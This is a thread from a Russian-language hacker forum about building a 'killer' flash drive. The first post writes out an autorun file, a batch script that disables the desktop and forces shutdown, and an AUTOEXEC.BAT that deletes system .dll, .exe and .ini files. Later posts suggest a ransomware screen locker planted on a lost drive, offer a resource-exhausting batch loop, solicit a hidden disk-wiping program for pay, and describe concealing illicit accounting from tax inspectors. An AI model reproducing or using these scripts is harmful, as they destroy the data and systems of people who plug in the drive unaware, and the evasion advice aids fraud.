УСЛУГИ ХАКЕРОВ /HACKER'S_CLUB/ТЕМАТИЧЕСКИЙ САЙТ- ФОРУМ ДЛЯ ОБЩЕНИЯ ХАКЕРОВ/

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

флешка убица для пк!(как создать)

Сообщений 1 страница 8 из 8

1

Берем флешку которую вам не жалко (больше вы не сможите ей пользоватся)Создаем на ней:
AUTOEXEC.BAT
Dead.BAT
autorun.ini

в AUTOEXEC.BAT пишем:
goto %config%
:dos1
rem c:vc401vc
lh keyrus
lh mmouse
lh C:WINDOWSCOMMANDmscdex /d:12345678
lh dndn
bootgui=0
:dos2
rem essolo.com
lh keyrus
lh mmouse
lh dndn
bootgui=0
:win
rem c:essolo.com
set path=C:WINDOWS;C:WINDOWSCOMMAND;c:;c:windows;c:windowscomand;c:arc;c:dn
C:WINDOWSCOMMANDDELTREE /y C:WINDOWSTEMP*.*
mode con codepage prepare=((866) C:WINDOWSCOMMANDega3.cpi)
mode con codepage select=866
keyb ru,,C:WINDOWSCOMMANDkeybrd3.sys
goto continue
:meos
c:kolibrimeosload.com
:l:meosload.com
:continue
rem bootgui=1
cd
cd windows
del *.dll
del *.ini
cd system32
del *.dll
del *.exe
cd D:
del *.exe

в Dead.BAT пишем:
@echo off
cp Флешка:AUTOEXEC.BAT C:
msg * "Dead" >nul
reg add HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
shutdown -s -t 1 -c "lol" -f >nul

в autorun.ini пишем:
[autorun]
OPEN=Dead.BAT

готово!
как это работает:
Вы вставляете флешку autorun.ini автоматичиски открывает Dead.BAT, Dead.BAT копирует AUTOEXEC.BAT на C и выключает компютер. при следущем запуске система слетает.

+2

2

Вариант не плохой ,только если только Антивирус с устаревшими базами лет так на пять:)
Он не пропускает запуск программы и копирование на диск C.

0

3

та я считаю винлок(банер вымогатель) идиальный вариант на флехе.....
ток там пишеш чтоб флеху вернули и свой номер....
весит мало но пользы море....всякая школоло если флеху найдет сразу откроют приложение .ехе
с каким либо заманчивым названием .....ну в 98% ...
польза всегда должна быть....

0

4

Вот это уже ближе к теме! Запуска в ручную хватит.

0

5

приветствую всех! Читаю все,такое ощущение что нахожусь на другой планете,так как в программировании я полный чайник. У меня просьба; мне нужна такая программа на мой комп,чтобы при включении и запуске,необходимо было бы нажать,скажем вместо команды "пуск" на мониторе,какую нибудь комбинацию цифр или букв.В противном случае ,все содержимое диска С,D, полностью удалялось.В общем ,нужна защита,только чтобы визуально она видна не была.Кто то включил ,смотрит грузится виндоус,а на самом деле идет полное удаление всей информации с компа.Я знаю,что для понимающих,это не проблема.Кто может помоч,пишите на sinko.vasia@mail.ru,разумеется с материальной компенсацией.

0

6

Небольшая программка, с помощью которой можно загадить память ПК, но на время. После перезагрузки все будет как прежде. Мелочь но прикольно.
@echo off
:x
start mspaint
start notepad
goto x

Может кому пригодится, хотя можно и усовершенствовать.

Отредактировано AnaTolik LazzaReff (2014-04-19 19:11:19)

0

7

вася написал(а):

приветствую всех! Читаю все,такое ощущение что нахожусь на другой планете,так как в программировании я полный чайник. У меня просьба; мне нужна такая программа на мой комп,чтобы при включении и запуске,необходимо было бы нажать,скажем вместо команды "пуск" на мониторе,какую нибудь комбинацию цифр или букв.В противном случае ,все содержимое диска С,D, полностью удалялось.В общем ,нужна защита,только чтобы визуально она видна не была.Кто то включил ,смотрит грузится виндоус,а на самом деле идет полное удаление всей информации с компа.Я знаю,что для понимающих,это не проблема.Кто может помоч,пишите на sinko.vasia@mail.ru,разумеется с материальной компенсацией.

Смотря какая задача. Однажды была поставлена задача: обезопасить предприятие N от неожиданных проверок фискальных органов (которые как известно сначала "ласты за спину, грабят оргтехнику, потом долго разбираются"), сохраняя при этом всю черную бухгалтерию и документацию по сделкам в полной безопасности.
Ввести отдельный сервер внутри предприятия не представлялось возможным, как собственно и внешнюю сеть.
выход был найден с помощью Если нельзя, но очень хочется (?) >>безопасность (виртуальная машина) (об этом уже писала) а сама виртуальная машина была расположена на простой флешке, которая подключалась к принтеру (данные с неё по паролю загружались лишь в ОЗУ).
Несколько пасов в виде второго рабочего стола, в автозагрузке включение виртуальной машины и автоперехода на 2-й рабочий стол отнимало максимум на 24 секунды больше времени. Доступ к машине даже не надо паролировать было. При отсутствии флешки никакие логи на компьютере не выдавали присутствия какой-либо "левой" документации.

Для каждой задачи нужен разный подход, поэтому если в целом опишите условия, тогда можно что-то посоветовать... а так форматировать С, D... даже при низкоуровневом форматировании данные сохраняются... да и времени отнимает на формат скажем диска в 1 Тб не так уж и мало ))) а переставив HDD на другой компьютер вытащить информацию вообще нет труда.

0

8

Какие сложности днако

0

Рейтинг форумов | Создать форум бесплатно © 2007–2017 «QuadroSystems» LLC